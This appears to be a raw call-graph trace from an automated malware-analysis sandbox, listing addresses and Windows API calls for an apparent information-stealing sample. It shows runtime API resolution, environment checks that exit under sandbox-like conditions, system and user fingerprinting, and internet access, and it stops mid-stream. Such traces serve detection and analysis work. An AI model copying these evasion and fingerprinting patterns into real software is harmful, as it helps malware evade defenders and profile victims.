calls 80907->80908 80909 40255e 80908->80909 80910 415ed0 80909->80910 81119 415dc0 GetPEB 80910->81119 80912 415ed8 80913 416103 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 80912->80913 80914 415eea 80912->80914 80915 416164 GetProcAddress 80913->80915 80916 41617d 80913->80916 80917 415efc 21 API calls 80914->80917 80915->80916 80918 4161b6 80916->80918 80919 416186 GetProcAddress GetProcAddress 80916->80919 80917->80913 80920 4161d8 80918->80920 80921 4161bf GetProcAddress 80918->80921 80919->80918 80922 4161e1 GetProcAddress 80920->80922 80923 4161f9 80920->80923 80921->80920 80922->80923 80924 4136c0 80923->80924 80925 416202 GetProcAddress GetProcAddress 80923->80925 80926 416d40 80924->80926 80925->80924 80927 416d50 80926->80927 80928 4136cd 80927->80928 80929 416d7e lstrcpy 80927->80929 80930 401190 80928->80930 80929->80928 80931 4011a8 80930->80931 80932 4011d7 80931->80932 80933 4011cf ExitProcess 80931->80933 80934 401120 GetSystemInfo 80932->80934 80935 401144 80934->80935 80936 40113c ExitProcess 80934->80936 80937 4010d0 GetCurrentProcess VirtualAllocExNuma 80935->80937 80938 401101 ExitProcess 80937->80938 80939 401109 80937->80939 81120 401060 VirtualAlloc 80939->81120 80942 4011e0 81124 415090 80942->81124 80945 401209 __aulldiv 80946 40125a 80945->80946 80947 401252 ExitProcess 80945->80947 80948 413430 GetUserDefaultLangID 80946->80948 80949 413493 GetUserDefaultLangID 80948->80949 80950 413452 80948->80950 80956 4143c0 GetProcessHeap HeapAlloc GetUserNameA 80949->80956 80950->80949 80951 413481 ExitProcess 80950->80951 80952 413463 ExitProcess 80950->80952 80953 413477 ExitProcess 80950->80953 80954 41348b ExitProcess 80950->80954 80955 41346d ExitProcess 80950->80955 80954->80949 80956->80798 81126 416d10 80957->81126 80959 416fc1 lstrlen 80960 416fe0 80959->80960 80961 417018 80960->80961 80963 416ffa lstrcpy lstrcat 80960->80963 81127 416da0 80961->81127 80963->80961 80964 417024 80964->80802 80966 416ebb 80965->80966 80967 416f0b 80966->80967 80968 416ef9 lstrcpy 80966->80968 80967->80814 80968->80967 81131 4134e0 80969->81131 80971 41364e 80972 413658 sscanf 80971->80972 81160 416e00 80972->81160 80974 41366a SystemTimeToFileTime SystemTimeToFileTime 80975 4136a0 80974->80975 80976 41368e 80974->80976 80978 412bb0 80975->80978 80976->80975 80977 413698 ExitProcess 80976->80977 80979 412bbd 80978->80979 80980 416d40 lstrcpy 80979->80980 80981 412bcb 80980->80981 81162 416e20 lstrlen 80981->81162 80984 416e20 2 API calls 80985 412bed 80984->80985 80986 416e20 2 API calls 80985->80986 80987 412bfa 80986->80987 80988 416e20 2 API calls 80987->80988 80989 412c07 80988->80989 81166 402590 80989->81166 80994 416e20 2 API calls 80995 412cd5 80994->80995 80996 416fb0 4 API calls 80995->80996 80997 412ceb 80996->80997 80998 416ea0 lstrcpy 80997->80998 80999 412cf4 80998->80999 81000 416d40 lstrcpy 80999->81000 81001 412d11 81000->81001 81002 416fb0 4 API calls 81001->81002 81003 412d2a 81002->81003 81004 416ea0 lstrcpy 81003->81004 81005 412d36 81004->81005 81006 416fb0 4 API calls 81005->81006 81007 412d5a 81006->81007 81008 416ea0 lstrcpy 81007->81008 81009 412d66 81008->81009 81010 416d40 lstrcpy 81009->81010 81011 412d8b 81010->81011 81810 4141c0 GetWindowsDirectoryA 81011->81810 81014 416da0 lstrcpy 81015 412da2 81014->81015 81820 404540 81015->81820 81017 412da8 81965 40fae0 81017->81965 81019 412db0 81020 416d40 lstrcpy 81019->81020 81021 412dd3 81020->81021 81983 401500 81021->81983 81025 412de7 82138 40f3b0 81025->82138 81027 412def 81028 416d40 lstrcpy 81027->81028 81029 412e13 81028->81029 81030 401500 lstrcpy 81029->81030 81031 412e21 81030->81031 81032 405610 37 API calls 81031->81032 81033 412e27 81032->81033 82145 40f200 81033->82145 81035 412e2f 81036 401500 lstrcpy 81035->81036 81037 412e40 81036->81037 82155 40fd10 81037->82155 81039 412e45 81040 416d40 lstrcpy 81039->81040 81041 412e5e 81040->81041 82499 404c70 GetProcessHeap RtlAllocateHeap InternetOpenA 81041->82499 81043 412e63 81044 401500 lstrcpy 81043->81044 81045 412ed0 81044->81045 82506 40ef80 81045->82506 81047 412ed5 81048 416d40 lstrcpy 81047->81048 81049 412ef8 81048->81049 81050 401500 lstrcpy 81049->81050 81051 412f06 81050->81051 81116 4043db 81115->81116 81117 4043ec strlen 81116->81117 81118 402144 81116->81118 81117->81116 81118->80826 81119->80912 81122 401082 codecvt 81120->81122 81121 4010bd 81121->80942 81122->81121 81123 4010a2 VirtualFree 81122->81123 81123->81121 81125 4011f3 GlobalMemoryStatusEx 81124->81125 81125->80945 81126->80959 81128 416dc2 81127->81128 81129 416dec 81128->81129 81130 416dda lstrcpy 81128->81130 81129->80964 81130->81129 81132 416d40 lstrcpy 81131->81132 81133 4134f3 81132->81133 81134 416fb0 4 API calls 81133->81134 81135 413505 81134->81135 81136 416ea0 lstrcpy 81135->81136 81137 41350e 81136->81137 81138 416fb0 4 API calls 81137->81138 81139 413527 81138->81139 81140 416ea0 lstrcpy 81139->81140 81141 413530 81140->81141 81142 416fb0 4 API calls 81141->81142 81143 41354a 81142->81143 81144 416ea0 lstrcpy 81143->81144 81145 413553 81144->81145 81146 416fb0 4 API calls 81145->81146 81147 41356c 81146->81147 81148 416ea0 lstrcpy 81147->81148 81149 413575 81148->81149 81150 416fb0 4 API calls 81149->81150 81151 41358f 81150->81151 81152 416ea0 lstrcpy 81151->81152 81153 413598 81152->81153 81154 416fb0 4 API calls 81153->81154 81155 4135b3 81154->81155 81156 416ea0 lstrcpy 81155->81156 81157 4135bc 81156->81157 81158 416da0 lstrcpy 81157->81158 81159 4135d0 81158->81159 81159->80971 81161 416e12 81160->81161 81161->80974 81163 416e3f 81162->81163 81164 412be0 81163->81164 81165 416e7b lstrcpy 81163->81165 81164->80984 81165->81164 81167 4043b0 2 API calls 81166->81167 81168 4025a4 81167->81168 81169 4043b0 2 API calls 81168->81169 81170 4025bd 81169->81170 81171 4043b0 2 API calls 81170->81171 81172 4025d6 81171->81172 81173 4043b0 2 API calls 81172->81173 81174 4025ef 81173->81174 81175 4043b0 2 API calls 81174->81175 81176 402608 81175->81176 81177 4043b0 2 API calls 81176->81177 81178 402621 81177->81178 81179 4043b0 2 API calls 81178->81179 81180 40263a 81179->81180 81181 4043b0 2 API calls 81180->81181 81182 402653 81181->81182 81183 4043b0 2 API calls 81182->81183 81184 40266c 81183->81184 81185 4043b0 2 API calls 81184->81185 81186 402685 81185->81186 81187 4043b0 2 API calls 81186->81187 81188 40269e 81187->81188 81189 4043b0 2 API calls 81188->81189 81190 4026b7 81189->81190 81191 4043b0 2 API calls 81190->81191 81192 4026d0 81191->81192 81193 4043b0 2 API calls 81192->81193 81194 4026e9 81193->81194 81195 4043b0 2 API calls 81194->81195 81196 402702 81195->81196 81197 4043b0 2 API calls 81196->81197 81198 40271b 81197->81198 81199 4043b0 2 API calls 81198->81199 81200 402734 81199->81200 81201 4043b0 2 API calls 81200->81201 81202 40274d 81201->81202 81203 4043b0 2 API calls 81202->81203 81204 402766 81203->81204 81205 4043b0 2 API calls 81204->81205 81206 40277f 81205->81206 81207 4043b0 2 API calls 81206->81207 81208 402798 81207->81208 81209 4043b0 2 API calls 81208->81209 81210 4027b1 81209->81210 81211 4043b0 2 API calls 81210->81211 81212 4027ca 81211->81212 81213 4043b0 2 API calls 81212->81213 81214 4027e3 81213->81214 81215 4043b0 2 API calls 81214->81215 81216 4027fc 81215->81216 81217 4043b0 2 API calls 81216->81217 81218 402815 81217->81218 81219 4043b0 2 API calls 81218->81219 81220 40282e 81219->81220 81221 4043b0 2 API calls 81220->81221 81222 402847 81221->81222 81223 4043b0 2 API calls 81222->81223 81224 402860 81223->81224 81225 4043b0 2 API calls 81224->81225 81226 402879 81225->81226 81227 4043b0 2 API calls 81226->81227 81228 402892 81227->81228 81229 4043b0 2 API calls 81228->81229 81230 4028ab 81229->81230 81231 4043b0 2 API calls 81230->81231 81232 4028c4 81231->81232 81233 4043b0 2 API calls 81232->81233 81234 4028dd 81233->81234 81235 4043b0 2 API calls 81234->81235 81236 4028f6 81235->81236 81237 4043b0 2 API calls 81236->81237 81238 40290f 81237->81238 81239 4043b0 2 API calls 81238->81239 81240 402928 81239->81240 81241 4043b0 2 API calls 81240->81241 81242 402941 81241->81242 81243 4043b0 2 API calls 81242->81243 81244 40295a 81243->81244 81245 4043b0 2 API calls 81244->81245 81246 402973 81245->81246 81247 4043b0 2 API calls 81246->81247 81248 40298c 81247->81248 81249 4043b0 2 API calls 81248->81249 81250 4029a5 81249->81250 81251 4043b0 2 API calls 81250->81251 81252 4029be 81251->81252 81253 4043b0 2 API calls 81252->81253 81254 4029d7 81253->81254 81255 4043b0 2 API calls 81254->81255 81256 4029f0 81255->81256 81257 4043b0 2 API calls 81256->81257 81258 402a09 81257->81258 81259 4043b0 2 API calls 81258->81259 81260 402a22 81259->81260 81261 4043b0 2 API calls 81260->81261 81262 402a3b 81261->81262 81263 4043b0 2 API calls 81262->81263 81264 402a54 81263->81264 81265 4043b0 2 API calls 81264->81265 81266 402a6d 81265->81266 81267 4043b0 2 API calls 81266->81267 81268 402a86 81267->81268 81269 4043b0 2 API calls 81268->81269 81270 402a9f 81269->81270 81271 4043b0 2 API calls 81270->81271 81272 402ab8 81271->81272 81273 4043b0 2 API calls 81272->81273 81274 402ad1 81273->81274 81275 4043b0 2 API calls 81274->81275 81276 402aea 81275->81276 81277 4043b0 2 API calls 81276->81277 81278 402b03 81277->81278 81279 4043b0 2 API calls 81278->81279 81280 402b1c 81279->81280 81281 4043b0 2 API calls 81280->81281 81282 402b35 81281->81282 81283 4043b0 2 API calls 81282->81283 81284 402b4e 81283->81284 81285 4043b0 2 API calls 81284->81285 81286 402b67 81285->81286 81287 4043b0 2 API calls 81286->81287 81288 402b80 81287->81288 81289 4043b0 2 API calls 81288->81289 81290 402b99 81289->81290 81291 4043b0 2 API calls 81290->81291 81292 402bb2 81291->81292 81293 4043b0 2 API calls 81292->81293 81294 402bcb 81293->81294 81295 4043b0 2 API calls 81294->81295 81296 402be4 81295->81296 81297 4043b0 2 API calls 81296->81297 81298 402bfd 81297->81298 81299 4043b0 2 API calls 81298->81299 81300 402c16 81299->81300 81301 4043b0 2 API calls 81300->81301 81302 402c2f 81301->81302 81303 4043b0 2 API calls 81302->81303 81304 402c48 81303->81304 81305 4043b0 2 API calls 81304->81305 81306 402c61 81305->81306 81307 4043b0 2 API calls 81306->81307 81308 402c7a 81307->81308 81309 4043b0 2 API calls 81308->81309 81310 402c93 81309->81310 81311 4043b0 2 API calls 81310->81311 81312 402cac 81311->81312 81313 4043b0 2 API calls 81312->81313 81314 402cc5 81313->81314 81315 4043b0 2 API calls 81314->81315 81316 402cde 81315->81316 81317 4043b0 2 API calls 81316->81317 81318 402cf7 81317->81318 81319 4043b0 2 API calls 81318->81319 81320 402d10 81319->81320 81321 4043b0 2 API calls 81320->81321 81322 402d29 81321->81322 81323 4043b0 2 API calls 81322->81323 81324 402d42 81323->81324 81325 4043b0 2 API calls 81324->81325 81326 402d5b 81325->81326 81327 4043b0 2 API calls 81326->81327 81328 402d74 81327->81328 81329 4043b0 2 API calls 81328->81329 81330 402d8d 81329->81330 81331 4043b0 2 API calls 81330->81331 81332 402da6 81331->81332 81333 4043b0 2 API calls 81332->81333 81334 402dbf 81333->81334 81335 4043b0 2 API calls 81334->81335 81336 402dd8 81335->81336 81337 4043b0 2 API calls 81336->81337 81338 402df1 81337->81338 81339 4043b0 2 API calls 81338->81339 81340 402e0a 81339->81340 81341 4043b0 2 API calls 81340->81341 81342 402e23 81341->81342 81343 4043b0 2 API calls 81342->81343 81344 402e3c 81343->81344 81345 4043b0 2 API calls 81344->81345 81346 402e55 81345->81346 81347 4043b0 2 API calls 81346->81347 81348 402e6e 81347->81348 81349 4043b0 2 API calls 81348->81349 81350 402e87 81349->81350 81351 4043b0 2 API calls 81350->81351 81352 402ea0 81351->81352 81353 4043b0 2 API calls 81352->81353 81354 402eb9 81353->81354 81355 4043b0 2 API calls 81354->81355 81356 402ed2 81355->81356 81357 4043b0 2 API calls 81356->81357 81358 402eeb 81357->81358 81359 4043b0 2 API calls 81358->81359 81360 402f04 81359->81360 81361 4043b0 2 API calls 81360->81361 81362 402f1d 81361->81362 81363 4043b0 2 API calls 81362->81363 81364 402f36 81363->81364 81365 4043b0 2 API calls 81364->81365 81366 402f4f 81365->81366 81367 4043b0 2 API calls 81366->81367 81368 402f68 81367->81368 81369 4043b0 2 API calls 81368->81369 81370 402f81 81369->81370 81371 4043b0 2 API calls 81370->81371 81372 402f9a 81371->81372 81373 4043b0 2 API calls 81372->81373 81374 402fb3 81373->81374 81375 4043b0 2 API calls 81374->81375 81376 402fcc 81375->81376 81377 4043b0 2 API calls 81376->81377 81378 402fe5 81377->81378 81379 4043b0 2 API calls 81378->81379 81380 402ffe 81379->81380 81381 4043b0 2 API calls 81380->81381 81382 403017 81381->81382 81383 4043b0 2 API calls 81382->81383 81384 403030 81383->81384 81385 4043b0 2 API calls 81384->81385 81386 403049 81385->81386 81387 4043b0 2 API calls 81386->81387 81388 403062 81387->81388 81389 4043b0 2 API calls 81388->81389 81390 40307b 81389->81390 81391 4043b0 2 API calls 81390->81391 81392 403094 81391->81392 81393 4043b0 2 API calls 81392->81393 81394 4030ad 81393->81394 81395 4043b0 2 API calls 81394->81395 81396 4030c6 81395->81396 81397 4043b0 2 API calls 81396->81397 81398 4030df 81397->81398 81399 4043b0 2 API calls 81398->81399 81400 4030f8 81399->81400 81401 4043b0 2 API calls 81400->81401 81402 403111 81401->81402 81403 4043b0 2 API calls 81402->81403 81404 40312a 81403->81404 81405 4043b0 2 API calls 81404->81405 81406 403143 81405->81406 81407 4043b0 2 API calls 81406->81407 81408 40315c 81407->81408 81409 4043b0 2 API calls 81408->81409 81410 403175 81409->81410 81411 4043b0 2 API calls 81410->81411 81412 40318e 81411->81412 81413 4043b0 2 API calls 81412->81413 81414 4031a7 81413->81414 81415 4043b0 2 API calls 81414->81415 81416 4031c0 81415->81416 81417 4043b0 2 API calls 81416->81417 81418 4031d9 81417->81418 81419 4043b0 2 API calls 81418->81419 81420 4031f2 81419->81420 81421 4043b0 2 API calls 81420->81421 81422 40320b 81421->81422 81423 4043b0 2 API calls 81422->81423 81424 403224 81423->81424 81425 4043b0 2 API calls 81424->81425 81426 40323d 81425->81426 81427 4043b0 2 API calls 81426->81427 81428 403256 81427->81428 81429 4043b0 2 API calls 81428->81429 81430 40326f 81429->81430 81431 4043b0 2 API calls 81430->81431 81432 403288 81431->81432 81433 4043b0 2 API calls 81432->81433 81434 4032a1 81433->81434 81435 4043b0 2 API calls 81434->81435 81436 4032ba 81435->81436 81437 4043b0 2 API calls 81436->81437 81438 4032d3 81437->81438 81439 4043b0 2 API calls 81438->81439 81440 4032ec 81439->81440 81441 4043b0 2 API calls 81440->81441 81442 403305 81441->81442 81443 4043b0 2 API calls 81442->81443 81444 40331e 81443->81444 81445 4043b0 2 API calls 81444->81445 81446 403337 81445->81446 81447 4043b0 2 API calls 81446->81447 81448 403350 81447->81448 81449 4043b0 2 API calls 81448->81449 81450 403369 81449->81450 81451 4043b0 2 API calls 81450->81451 81452 403382 81451->81452 81453 4043b0 2 API calls 81452->81453 81454 40339b 81453->81454 81455 4043b0 2 API calls 81454->81455 81456 4033b4 81455->81456 81457 4043b0 2 API calls 81456->81457 81458 4033cd 81457->81458 81459 4043b0 2 API calls 81458->81459 81460 4033e6 81459->81460 81461 4043b0 2 API calls 81460->81461 81462 4033ff 81461->81462 81463 4043b0 2 API calls 81462->81463 81464 403418 81463->81464 81465 4043b0 2 API calls 81464->81465 81466 403431 81465->81466 81467 4043b0 2 API calls 81466->81467 81468 40344a 81467->81468 81469 4043b0 2 API calls 81468->81469 81470 403463 81469->81470 81471 4043b0 2 API calls 81470->81471 81472 40347c 81471->81472 81473 4043b0 2 API calls 81472->81473 81474 403495 81473->81474 81475 4043b0 2 API calls 81474->81475 81476 4034ae 81475->81476 81477 4043b0 2 API calls 81476->81477 81478 4034c7 81477->81478 81479 4043b0 2 API calls 81478->81479 81480 4034e0 81479->81480 81481 4043b0 2 API calls 81480->81481 81482 4034f9 81481->81482 81483 4043b0 2 API calls 81482->81483 81484 403512 81483->81484 81485 4043b0 2 API calls 81484->81485 81486 40352b 81485->81486 81487 4043b0 2 API calls 81486->81487 81488 403544 81487->81488 81489 4043b0 2 API calls 81488->81489 81490 40355d 81489->81490 81491 4043b0 2 API calls 81490->81491 81492 403576 81491->81492 81493 4043b0 2 API calls 81492->81493 81494 40358f 81493->81494 81495 4043b0 2 API calls 81494->81495 81496 4035a8 81495->81496 81497 4043b0 2 API calls 81496->81497 81498 4035c1 81497->81498 81499 4043b0 2 API calls 81498->81499 81500 4035da 81499->81500 81501 4043b0 2 API calls 81500->81501 81502 4035f3 81501->81502 81503 4043b0 2 API calls 81502->81503 81504 40360c 81503->81504 81505 4043b0 2 API calls 81504->81505 81506 403625 81505->81506 81507 4043b0 2 API calls 81506->81507 81508 40363e 81507->81508 81509 4043b0 2 API calls 81508->81509 81510 403657 81509->81510 81511 4043b0 2 API calls 81510->81511 81512 403670 81511->81512 81513 4043b0 2 API calls 81512->81513 81514 403689 81513->81514 81515 4043b0 2 API calls 81514->81515 81516 4036a2 81515->81516 81517 4043b0 2 API calls 81516->81517 81518 4036bb 81517->81518 81519 4043b0 2 API calls 81518->81519 81520 4036d4 81519->81520 81521 4043b0 2 API calls 81520->81521 81522 4036ed 81521->81522 81523 4043b0 2 API calls 81522->81523 81524 403706 81523->81524 81525 4043b0 2 API calls 81524->81525 81526 40371f 81525->81526 81527 4043b0 2 API calls 81526->81527 81528 403738 81527->81528 81529 4043b0 2 API calls 81528->81529 81530 403751 81529->81530 81531 4043b0 2 API calls 81530->81531 81532 40376a 81531->81532 81533 4043b0 2 API calls 81532->81533 81534 403783 81533->81534 81535 4043b0 2 API calls 81534->81535 81536 40379c 81535->81536 81537 4043b0 2 API calls 81536->81537 81538 4037b5 81537->81538 81539 4043b0 2 API calls 81538->81539 81540 4037ce 81539->81540 81541 4043b0 2 API calls 81540->81541 81542 4037e7 81541->81542 81543 4043b0 2 API calls 81542->81543 81544 403800 81543->81544 81545 4043b0 2 API calls 81544->81545 81546 403819 81545->81546 81547 4043b0 2 API calls 81546->81547 81548 403832 81547->81548 81549 4043b0 2 API calls 81548->81549 81550 40384b 81549->81550 81551 4043b0 2 API calls 81550->81551 81552 403864 81551->81552 81553 4043b0 2 API calls 81552->81553 81554 40387d 81553->81554 81555 4043b0 2 API calls 81554->81555 81556 403896 81555->81556 81557 4043b0 2 API calls 81556->81557 81558 4038af 81557->81558 81559 4043b0 2 API calls 81558->81559 81560 4038c8 81559->81560 81561 4043b0 2 API calls 81560->81561 81562 4038e1 81561->81562 81563 4043b0 2 API calls 81562->81563 81564 4038fa 81563->81564 81565 4043b0 2 API calls 81564->81565 81566 403913 81565->81566 81567 4043b0 2 API calls 81566->81567 81568 40392c 81567->81568 81569 4043b0 2 API calls 81568->81569 81570 403945 81569->81570 81571 4043b0 2 API calls 81570->81571 81572 40395e 81571->81572 81573 4043b0 2 API calls 81572->81573 81574 403977 81573->81574 81575 4043b0 2 API calls 81574->81575 81576 403990 81575->81576 81577 4043b0 2 API calls 81576->81577 81578 4039a9 81577->81578 81579 4043b0 2 API calls 81578->81579 81580 4039c2 81579->81580 81581 4043b0 2 API calls 81580->81581 81582 4039db 81581->81582 81583 4043b0 2 API calls 81582->81583 81584 4039f4 81583->81584 81585 4043b0 2 API calls 81584->81585 81586 403a0d 81585->81586 81587 4043b0 2 API calls 81586->81587 81588 403a26 81587->81588 81589 4043b0 2 API calls 81588->81589 81590 403a3f 81589->81590 81591 4043b0 2 API calls 81590->81591 81592 403a58 81591->81592 81593 4043b0 2 API calls 81592->81593 81594 403a71 81593->81594 81595 4043b0 2 API calls 81594->81595 81596 403a8a 81595->81596 81597 4043b0 2 API calls 81596->81597 81598 403aa3 81597->81598 81599 4043b0 2 API calls 81598->81599 81600 403abc 81599->81600 81601 4043b0 2 API calls 81600->81601 81602 403ad5 81601->81602 81603 4043b0 2 API calls 81602->81603 81604 403aee 81603->81604 81605 4043b0 2 API calls 81604->81605 81606 403b07 81605->81606 81607 4043b0 2 API calls 81606->81607 81608 403b20 81607->81608 81609 4043b0 2 API calls 81608->81609 81610 403b39 81609->81610 81611 4043b0 2 API calls 81610->81611 81612 403b52 81611->81612 81613 4043b0 2 API calls 81612->81613 81614 403b6b 81613->81614 81615 4043b0 2 API calls 81614->81615 81616 403b84 81615->81616 81617 4043b0 2 API calls 81616->81617 81618 403b9d 81617->81618 81619 4043b0 2 API calls 81618->81619 81620 403bb6 81619->81620 81621 4043b0 2 API calls 81620->81621 81622 403bcf 81621->81622 81623 4043b0 2 API calls 81622->81623 81624 403be8 81623->81624 81625 4043b0 2 API calls 81624->81625 81626 403c01 81625->81626 81627 4043b0 2 API calls 81626->81627 81628 403c1a 81627->81628 81629 4043b0 2 API calls 81628->81629 81630 403c33 81629->81630 81631 4043b0 2 API calls 81630->81631 81632 403c4c 81631->81632 81633 4043b0 2 API calls 81632->81633 81634 403c65 81633->81634 81635 4043b0 2 API calls 81634->81635 81636 403c7e 81635->81636 81637 4043b0 2 API calls 81636->81637 81638 403c97 81637->81638 81639 4043b0 2 API calls 81638->81639 81640 403cb0 81639->81640 81641 4043b0 2 API calls 81640->81641 81642 403cc9 81641->81642 81643 4043b0 2 API calls 81642->81643 81644 403ce2 81643->81644 81645 4043b0 2 API calls 81644->81645 81646 403cfb 81645->81646 81647 4043b0 2 API calls 81646->81647 81648 403d14 81647->81648 81649 4043b0 2 API calls 81648->81649 81650 403d2d 81649->81650 81651 4043b0 2 API calls 81650->81651 81652 403d46 81651->81652 81653 4043b0 2 API calls 81652->81653 81654 403d5f 81653->81654 81655 4043b0 2 API calls 81654->81655 81656 403d78 81655->81656 81657 4043b0 2 API calls 81656->81657 81658 403d91 81657->81658 81659 4043b0 2 API calls 81658->81659 81660 403daa 81659->81660 81661 4043b0 2 API calls 81660->81661 81662 403dc3 81661->81662 81663 4043b0 2 API calls 81662->81663 81664 403ddc 81663->81664 81665 4043b0 2 API calls 81664->81665 81666 403df5 81665->81666 81667 4043b0 2 API calls 81666->81667 81668 403e0e 81667->81668 81669 4043b0 2 API calls 81668->81669 81670 403e27 81669->81670 81671 4043b0 2 API calls 81670->81671 81672 403e40 81671->81672 81673 4043b0 2 API calls 81672->81673 81674 403e59 81673->81674 81675 4043b0 2 API calls 81674->81675 81676 403e72 81675->81676 81677 4043b0 2 API calls 81676->81677 81678 403e8b 81677->81678 81679 4043b0 2 API calls 81678->81679 81680 403ea4 81679->81680 81681 4043b0 2 API calls 81680->81681 81682 403ebd 81681->81682 81683 4043b0 2 API calls 81682->81683 81684 403ed6 81683->81684 81685 4043b0 2 API calls 81684->81685 81686 403eef 81685->81686 81687 4043b0 2 API calls 81686->81687 81688 403f08 81687->81688 81689 4043b0 2 API calls 81688->81689 81690 403f21 81689->81690 81691 4043b0 2 API calls 81690->81691 81692 403f3a 81691->81692 81693 4043b0 2 API calls 81692->81693 81694 403f53 81693->81694 81695 4043b0 2 API calls 81694->81695 81696 403f6c 81695->81696 81697 4043b0 2 API calls 81696->81697 81698 403f85 81697->81698 81699 4043b0 2 API calls 81698->81699 81700 403f9e 81699->81700 81701 4043b0 2 API calls 81700->81701 81702 403fb7 81701->81702 81703 4043b0 2 API calls 81702->81703 81704 403fd0 81703->81704 81705 4043b0 2 API calls 81704->81705 81706 403fe9 81705->81706 81707 4043b0 2 API calls 81706->81707 81708 404002 81707->81708 81709 4043b0 2 API calls 81708->81709 81710 40401b 81709->81710 81711 4043b0 2 API calls 81710->81711 81712 404034 81711->81712 81713 4043b0 2 API calls 81712->81713 81714 40404d 81713->81714 81715 4043b0 2 API calls 81714->81715 81716 404066 81715->81716 81717 4043b0 2 API calls 81716->81717 81718 40407f 81717->81718 81719 4043b0 2 API calls 81718->81719 81720 404098 81719->81720 81721 4043b0 2 API calls 81720->81721 81722 4040b1 81721->81722 81723 4043b0 2 API calls 81722->81723 81724 4040ca 81723->81724 81725 4043b0 2 API calls 81724->81725 81726 4040e3 81725->81726 81727 4043b0 2 API calls 81726->81727 81728 4040fc 81727->81728 81729 4043b0 2 API calls 81728->81729 81730 404115 81729->81730 81731 4043b0 2 API calls 81730->81731 81732 40412e 81731->81732 81733 4043b0 2 API calls 81732->81733 81734 404147 81733->81734 81735 4043b0 2 API calls 81734->81735 81736 404160 81735->81736 81737 4043b0 2 API calls 81736->81737 81738 404179 81737->81738 81739 4043b0 2 API calls 81738->81739 81740 404192 81739->81740 81741 4043b0 2 API calls 81740->81741 81742 4041ab 81741->81742 81743 4043b0 2 API calls 81742->81743 81744 4041c4 81743->81744 81745 4043b0 2 API calls 81744->81745 81746 4041dd 81745->81746 81747 4043b0 2 API calls 81746->81747 81748 4041f6 81747->81748 81749 4043b0 2 API calls 81748->81749 81750 40420f 81749->81750 81751 4043b0 2 API calls 81750->81751 81752 404228 81751->81752 81753 4043b0 2 API calls 81752->81753 81754 404241 81753->81754 81755 4043b0 2 API calls 81754->81755 81756 40425a 81755->81756 81757 4043b0 2 API calls 81756->81757 81758 404273 81757->81758 81759 4043b0 2 API calls 81758->81759 81760 40428c 81759->81760 81761 4043b0 2 API calls 81760->81761 81762 4042a5 81761->81762 81763 4043b0 2 API calls 81762->81763 81764 4042be 81763->81764 81765 4043b0 2 API calls 81764->81765 81766 4042d7 81765->81766 81767 4043b0 2 API calls 81766->81767 81768 4042f0 81767->81768 81769 4043b0 2 API calls 81768->81769 81770 404309 81769->81770 81771 4043b0 2 API calls 81770->81771 81772 404322 81771->81772 81773 4043b0 2 API calls 81772->81773 81774 40433b 81773->81774 81775 4043b0 2 API calls 81774->81775 81776 404354 81775->81776 81777 4043b0 2 API calls 81776->81777 81778 40436d 81777->81778 81779 4043b0 2 API calls 81778->81779 81780 404386 81779->81780 81781 4043b0 2 API calls 81780->81781 81782 40439f 81781->81782 81783 416240 81782->81783 81784 416250 43 API calls 81783->81784 81785 416666 8 API calls 81783->81785 81784->81785 81786 416776 81785->81786 81787 4166fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81785->81787 81788 416783 8 API calls 81786->81788 81789 416846 81786->81789 81787->81786 81788->81789 81790 4168c8 81789->81790 81791 41684f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81789->81791 81792 4168d5 6 API calls 81790->81792 81793 416967 81790->81793 81791->81790 81792->81793 81794 416974 9 API calls 81793->81794 81795 416a4f 81793->81795 81794->81795 81796 416ad2 81795->81796 81797 416a58 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81795->81797 81798 416adb GetProcAddress GetProcAddress 81796->81798 81799 416b0c 81796->81799 81797->81796 81798->81799 81800 416b45 81799->81800 81801 416b15 GetProcAddress GetProcAddress 81799->81801 81802 416b52 8 API calls 81800->81802 81803 416c15 81800->81803 81801->81800 81802->81803 81804 416c7f 81803->81804 81805 416c1e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81803->81805 81806 416ca1 81804->81806 81807 416c88 GetProcAddress 81804->81807 81805->81804 81808 412cc6 81806->81808 81809 416caa GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81806->81809 81807->81806 81808->80994 81809->81808 81811 4141f0 GetVolumeInformationA 81810->81811 81812 4141e9 81810->81812 81813 41422e 81811->81813 81812->81811 81814 414299 GetProcessHeap HeapAlloc 81813->81814 81815 4142c5 wsprintfA 81814->81815 81816 4142b6 81814->81816 81817 416d40 lstrcpy 81815->81817 81818 416d40 lstrcpy 81816->81818 81819 412d94 81817->81819 81818->81819 81819->81014 81821 416da0 lstrcpy 81820->81821 81822 404559 81821->81822 82840 404470 81822->82840 81824 404565 81825 416d40 lstrcpy 81824->81825 81826 404597 81825->81826 81827 416d40 lstrcpy 81826->81827 81828 4045a4 81827->81828 81829 416d40 lstrcpy 81828->81829 81830 4045b1 81829->81830 81831 416d40 lstrcpy 81830->81831 81832 4045be 81831->81832 81833 416d40 lstrcpy 81832->81833 81834 4045cb InternetOpenA StrCmpCA 81833->81834 81835 404604 81834->81835 81836 404b8b InternetCloseHandle 81835->81836 82852 415260 81835->82852 81838 404ba8 81836->81838 82867 4094a0 CryptStringToBinaryA 81838->82867 81839 404623 82860 416f20 81839->82860 81842 404636 81844 416ea0 lstrcpy 81842->81844 81849 40463f 81844->81849 81845 416e20 2 API calls 81846 404bc5 81845->81846 81847 416fb0 4 API calls 81846->81847 81850 404bdb 81847->81850 81848 404be7 codecvt 81852 416da0 lstrcpy 81848->81852 81853 416fb0 4 API calls 81849->81853 81851 416ea0 lstrcpy 81850->81851 81851->81848 81865 404c17 81852->81865 81854 404669 81853->81854 81855 416ea0 lstrcpy 81854->81855 81856 404672 81855->81856 81857 416fb0 4 API calls 81856->81857 81858 404691 81857->81858 81859 416ea0 lstrcpy 81858->81859 81860 40469a 81859->81860 81861 416f20 3 API calls 81860->81861 81862 4046b8 81861->81862 81863 416ea0 lstrcpy 81862->81863 81864 4046c1 81863->81864 81866 416fb0 4 API calls 81864->81866 81865->81017 81867 4046e0 81866->81867 81868 416ea0 lstrcpy 81867->81868 81869 4046e9 81868->81869 81870 416fb0 4 API calls 81869->81870 81871 404708 81870->81871 81872 416ea0 lstrcpy 81871->81872 81873 404711 81872->81873 81874 416fb0 4 API calls 81873->81874 81875 40473d 81874->81875 81876 416f20 3 API calls 81875->81876 81877 404744 81876->81877 81878 